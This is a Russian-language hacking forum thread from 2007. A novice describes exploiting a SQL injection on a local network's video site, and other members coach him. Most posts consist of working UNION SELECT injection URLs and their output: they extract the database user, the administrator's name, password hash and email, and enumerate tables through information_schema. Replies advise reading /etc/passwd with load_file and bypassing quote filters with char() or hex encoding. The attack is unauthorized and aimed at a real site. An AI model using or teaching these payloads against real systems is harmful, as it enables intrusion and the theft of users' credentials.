Кто разбирается в SQL Injection
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Кто разбирается в SQL Injection - 2007-08-23 04:50:31.600000
|
|
|
A_DnX
Сообщений: 31
Оценки: 0
Присоединился: 2007-08-18 02:38:26.056666
|
Всем привет. Подскажите пожалуйста толковый совет.
Я долго-долго читал и учился хаку, но на практике ничего не применял. И вот я решил опробовать свои способности (думаю, настало время :))
Начать я решил с сайта местной локалки. Потыкав немного по ссылкам нашел пару XSS в скриптах поиска и скуль инъекцию:
[link=http://target.com/video/index.php?act=film&id='][u][color=#0000ff]http://target.com/video/index.php?act=film&id='
Неверный MySQL запрос - select * from movie where id = '''You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
Опыта реализации XSS у меня нет, поэтому я взялся за уколы. Поля подобрал быстро - всего 6:
http://target.com/video/index.php?act=film&id=-1+union+select+1,2,3,4,5,6%20/*
отображаются почти все:
3 [IP: 6] [DATE: 2]
5
После этого узнал имя юзера, название и версию базы:
http://target.com/video/index.php?act=film&id=-1+union+select+1,2,3,4,user(),6%20/*
target@localhost
http://target.com/video/index.php?act=film&id=-1+union+select+1,2,3,4,database(),6%20/*
target
http://target.com/video/index.php?act=film&id=-1+union+select+1,2,3,4,version(),6%20/*
5.0.26
Таблица пользователей и название поля с логинами дались относительно легко, вот только юзер в ней оказался всего один: Administrator (или это я чего то не догнал?)
http://target.com/video/index.php?act=film&id=-1+union+select+1,2,3,4,name,6+from+target_users%20/*
Administrator
http://target.com/video/index.php?act=film&id=-1+union+select+1,2,3,4,password,6+from+target_users%20/*
823ab6438660a19ed16d431a51af1474
http://target.com/video/index.php?act=film&id=-1+union+select+1,2,3,4,id,6+from+target_users%20/*
62
http://target.com/video/index.php?act=film&id=-1+union+select+1,2,3,4,email,6+from+target_users%20/*
[email=rim-rim@mail.ru]rim-rim@mail.ru[/email]
Больше вытянуть из target_users мне ничего не удалось :(
Прав доступа к mysql.user как я понял у меня нет. При запросах
http://target.com/video/index.php?act=film&id=-1+union+select+1,2,3,4,5,6+from+mysql.user%20/*
http://target.com/video/index.php?act=film&id=-1+union+select+1,2,3,4,user,6+from+mysql.user%20/*
страница отображается в обычном режиме.
При попытке использовать load_file(), страница то же отображается в обычном режиме
http://target.com/video/index.php?act=film&id=-1+union+select+1,2,3,4,load_file(/etc/passwd),6%20/*
Еще попробовал concat, так, ради интереса
http://target.com/video/index.php?act=film&id=-1+union+select+1,2,3,4,concat(email,char(32),password,char(32),name),6+from+target_users%20/*
rim-rim@mail.ru 823ab6438660a19ed16d431a51af1474 Administrator
И вот на этом я уперся лбом в стену. Что дальше делать не знаю. Подскажите начинающему, что можно поиметь с такого расклада и если можно, то как это сделать? Только не предлагайте натравливать на сайт кучу сканеров и сплоитов. Потому что во первых - нет такой возможности (нет, в софте недостатка нет-][акер выписываю уже несколько лет, а там софта хватает, да и другие источники есть, просто дома инета нет, тренироватся хожу в клуб), а во вторых - хочется сделать это красиво, да и вообще - люблю все делать своими руками, не полагаясь на помощь сплойтов и т.д., они для меня сродни читам в играх. К тому же что это за хакер, который без сплоитов не может справится с системой. Во всяком случае я к этому стремлюсь.
Заранее спасибо за помощь.
|
|
|
|
|
RE: Кто разбирается в SQL Injection - 2007-08-23 09:34:04.880000
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
>вот только юзер в ней оказался всего один: Administrator (или это я чего то не догнал?)
попробуй писать так:
http://target.com/video/index.php?act=film&id=-1+union+select+1,2,3,4,concat(id,name,password),6+from+target_users+limit+X,1/*
где X изначально равно 0, а потом постепенно увеличивай его на еденицу.
>5.0.26
должна быть таблица information_schema.tables, из которой можно выбрать поле table_name (не забывай про limit, чтобы выбирать последовательно все записи)
>При попытке использовать load_file(), страница то же отображается в обычном режиме
1)проверь, фильтруются ли кавычки. Просто напиши union select 1,2,3,4,'5',6/*
2.1)если кавычки не фильтруются, то можно попробовать написать load_file('/etc/passwd')
2.2)иначе придется строку '/etc/passwd' закодировать как-нибудь, например последовательностью char(…) или 0x… (для получения второго варианта в php есть функция bin2hex)
|
|
|
|
|
RE: Кто разбирается в SQL Injection - 2007-08-23 12:00:15.926666
|
|
|
muse
Сообщений: 112
Оценки: 0
Присоединился: 2005-06-09 00:40:48
|
http://www.target.ru/index.php?rn_id=-53+union+select+1,table_name,3,4,5,6,7+from+information_schema.tables/*
Выводит имена таблиц, но при подстановке любой таблицы в запрос, скуль выводит ошибку что такой таблицы не существует.
В чем может быть загвоздка?
|
|
|
|
|
RE: Кто разбирается в SQL Injection - 2007-08-23 14:54:49.263333
|
|
|
A_DnX
Сообщений: 31
Оценки: 0
Присоединился: 2007-08-18 02:38:26.056666
|
quote:
ORIGINAL: Dimonelite
>вот только юзер в ней оказался всего один: Administrator (или это я чего то не догнал?)
попробуй писать так:
http://target.com/video/index.php?act=film&id=-1+union+select+1,2,3,4,concat(id,name,password),6+from+target_users+limit+X,1/*
где X изначально равно 0, а потом постепенно увеличивай его на еденицу.
>5.0.26
должна быть таблица information_schema.tables, из которой можно выбрать поле table_name (не забывай про limit, чтобы выбирать последовательно все записи)
>При попытке использовать load_file(), страница то же отображается в обычном режиме
1)проверь, фильтруются ли кавычки. Просто напиши union select 1,2,3,4,'5',6/*
2.1)если кавычки не фильтруются, то можно попробовать написать load_file('/etc/passwd')
2.2)иначе придется строку '/etc/passwd' закодировать как-нибудь, например последовательностью char(…) или 0x… (для получения второго варианта в php есть функция bin2hex)
concat выводит тоже что и у меня
кавычки фильтруются я сразу знал
а вот information_schema.tables действительно есть и я из нее table_name'ом через limit нормально отстрелялся - Спасибо.
Кто не понял
http://target.com/video/index.php?act=film&id=-1+union+select+1,2,3,4,table_name,6+from+information_schema.tables+limit+0,1%20/*
http://target.com/video/index.php?act=film&id=-1+union+select+1,2,3,4,table_name,6+from+information_schema.tables+limit+1,1%20/*
http://target.com/video/index.php?act=film&id=-1+union+select+1,2,3,4,table_name,6+from+information_schema.tables+limit+2,1%20/*
и т.д.
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
и т.д.
Вопрос на засыпку, что теперь с этим добром делать?
|
|
|
|
|
RE: Кто разбирается в SQL Injection - 2007-08-23 23:35:03.313333
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
советую выбирать не просто table_name, а concat(table_schema,table_name).
т.е. еще выбирать название БД, в которой находится та или иная таблица.
вероятнее всего среди этих таблиц будет что-то типа admins или users с полезной атакующему информацией.
|
|
|
|
|
RE: Кто разбирается в SQL Injection - 2007-08-24 01:45:12.156666
|
|
|
A_DnX
Сообщений: 31
Оценки: 0
Присоединился: 2007-08-18 02:38:26.056666
|
Ну ты даешь, я в первом случае пол дня сидел выбирал пока не догадался вместо X,1 поставить X,100
вот все
CHARACTER_SETS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
KEY_COLUMN_USAGE
ROUTINES
SCHEMATA
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
article_text
ban
blog_categories
blog_comments
blog_link2cat
blog_links
blog_options
blog_post2cat
blog_postmeta
blog_posts
blog_usermeta
blog_users
download_film_rate
fotogallery_albums
fotogallery_banned
fotogallery_bridge
fotogallery_categories
fotogallery_comments
fotogallery_config
fotogallery_dict
fotogallery_ecards
fotogallery_exif
fotogallery_favpics
fotogallery_filetypes
fotogallery_hit_stats
fotogallery_pictures
fotogallery_plugins
fotogallery_sessions
fotogallery_temp_data
fotogallery_usergroups
fotogallery_users
fotogallery_vote_stats
fotogallery_votes
lib_nucleus_actionlog
lib_nucleus_activation
lib_nucleus_ban
lib_nucleus_blog
lib_nucleus_category
lib_nucleus_comment
lib_nucleus_config
lib_nucleus_item
lib_nucleus_karma
lib_nucleus_member
lib_nucleus_plugin
lib_nucleus_plugin_event
lib_nucleus_plugin_option
lib_nucleus_plugin_option_desc
lib_nucleus_skin
lib_nucleus_skin_desc
lib_nucleus_team
lib_nucleus_template
lib_nucleus_template_desc
lib_nucleus_tickets
menu
movie
movie_old
movie_old
movie_prikol
phpbb_auth_access
phpbb_banlist
phpbb_categories
phpbb_config
phpbb_confirm
phpbb_disallow
phpbb_forum_prune
phpbb_forums
phpbb_groups
phpbb_posts
phpbb_posts_text
phpbb_privmsgs
phpbb_privmsgs_text
phpbb_ranks
phpbb_search_results
phpbb_search_wordlist
phpbb_search_wordmatch
phpbb_sessions
phpbb_sessions_keys
phpbb_smilies
phpbb_themes
phpbb_themes_name
phpbb_topics
phpbb_topics_watch
phpbb_user_group
phpbb_users
phpbb_vote_desc
phpbb_vote_results
phpbb_vote_voters
phpbb_words
platejka
site_admin
site_admin_ip
site_data
site_news
vote
yubi_banner
yubi_bannerclient
yubi_bannerfinish
yubi_categories
yubi_components
yubi_contact_details
yubi_content
yubi_content_frontpage
yubi_content_rating
yubi_core_acl_aro
yubi_core_acl_aro_groups
yubi_core_acl_aro_sections
yubi_core_acl_groups_aro_map
yubi_core_log_items
yubi_core_log_searches
yubi_groups
yubi_mambots
yubi_menu
yubi_messages
yubi_messages_cfg
yubi_modules
yubi_modules_menu
yubi_newsfeeds
yubi_poll_data
yubi_poll_date
yubi_poll_menu
yubi_polls
yubi_sections
yubi_session
yubi_stats_agents
yubi_template_positions
yubi_templates_menu
yubi_users
yubi_usertypes
yubi_weblinks
zakaz
а тут ты пишешь concat(table_schema,table_name)
и я из той же information_schema.tables начинаю вытягивать совершенно новые таблицы и их то же дохрена. Долго, нудно, но я не отступлю, я упорный, спасибо что помогаешь.
Подскажи на каких стоит заострить внимание?
это после concat(table_schema,table_name)
yubi-netphpbb_vote_results
yubi-netphpbb_vote_voters
yubi-netphpbb_words
yubi-netplatejka
yubi-netsite_admin
yubi-netsite_admin_ip
yubi-netsite_data
yubi-netsite_news
yubi-netvote
yubi-netyubi_banner
yubi-netyubi_bannerclient
yubi-netyubi_bannerfinish
yubi-netyubi_categories
yubi-netyubi_components
yubi-netyubi_contact_details
yubi-netyubi_content
yubi-netyubi_content_frontpage
yubi-netyubi_content_rating
yubi-netyubi_core_acl_aro
yubi-netyubi_core_acl_aro_groups
yubi-netyubi_core_acl_aro_sections
yubi-netyubi_core_acl_groups_aro_map
yubi-netyubi_core_log_items
yubi-netyubi_core_log_searches
yubi-netyubi_groups
yubi-netyubi_mambots
yubi-netyubi_menu
yubi-netyubi_messages
yubi-netyubi_messages_cfg
yubi-netyubi_modules
yubi-netyubi_modules_menu
yubi-netyubi_newsfeeds
yubi-netyubi_poll_data
yubi-netyubi_poll_date
yubi-netyubi_poll_menu
yubi-netyubi_polls
yubi-netyubi_sections
yubi-netyubi_session
yubi-netyubi_stats_agents
yubi-netyubi_template_positions
yubi-netyubi_templates_menu
yubi-netyubi_users
yubi-netyubi_usertypes
yubi-netyubi_weblinks
yubi-netzakaz
|
|
|
|
|
RE: Кто разбирается в SQL Injection - 2007-08-25 04:03:49.440000
|
|
|
A_DnX
Сообщений: 31
Оценки: 0
Присоединился: 2007-08-18 02:38:26.056666
|
По ходу лоханулся я, начинающему простительно.
Вчера синий был.
Сегодня пришел, ужаснулся, и понял.
Или понял и ужаснулся
|
|
|
|
|
RE: Кто разбирается в SQL Injection - 2007-08-27 00:54:13.216666
|
|
|
A_DnX
Сообщений: 31
Оценки: 0
Присоединился: 2007-08-18 02:38:26.056666
|
Бублик, Форб, Роид… отпишитесь, разъясните начинающему, у вас же учился. Никитос, пни кого нибудь локтем, не убивайте во мне такое начинание…
|
|
|
|
|
RE: Кто разбирается в SQL Injection - 2007-08-29 09:27:06.140000
|
|
|
nutsbutters
Сообщений: 6
Оценки: 0
Присоединился: 2007-07-31 05:44:36.626666
|
quote:
concat(table_schema,table_name)
concat(table_schema,':',table_name)
|
|
|
|
|
RE: Кто разбирается в SQL Injection - 2007-08-29 13:31:38.200000
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
quote:
ORIGINAL: nutsbutters
quote:
concat(table_schema,table_name)
concat(table_schema,':',table_name)
Ну ваще, прям блестнул знаниями. Если уж на то пошло, то concat_ws(':',table_schema,table_name,column_name)
|
|
|
|
|
RE: Кто разбирается в SQL Injection - 2007-09-03 21:55:38.753333
|
|
|
A_DnX
Сообщений: 31
Оценки: 0
Присоединился: 2007-08-18 02:38:26.056666
|
Спасибо Dimonelite, ты открыл мне новые грани.
|
|
|
|
|
|
